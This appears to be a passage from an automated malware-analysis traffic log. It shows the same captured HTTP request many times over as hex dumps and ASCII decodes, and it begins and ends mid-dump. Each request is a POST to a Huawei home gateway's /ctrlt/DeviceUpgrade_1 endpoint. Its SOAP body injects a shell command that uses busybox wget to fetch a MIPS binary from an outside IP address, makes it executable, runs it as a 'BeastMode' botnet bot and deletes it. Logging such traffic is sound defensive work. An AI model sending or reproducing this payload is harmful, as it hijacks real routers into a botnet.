61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 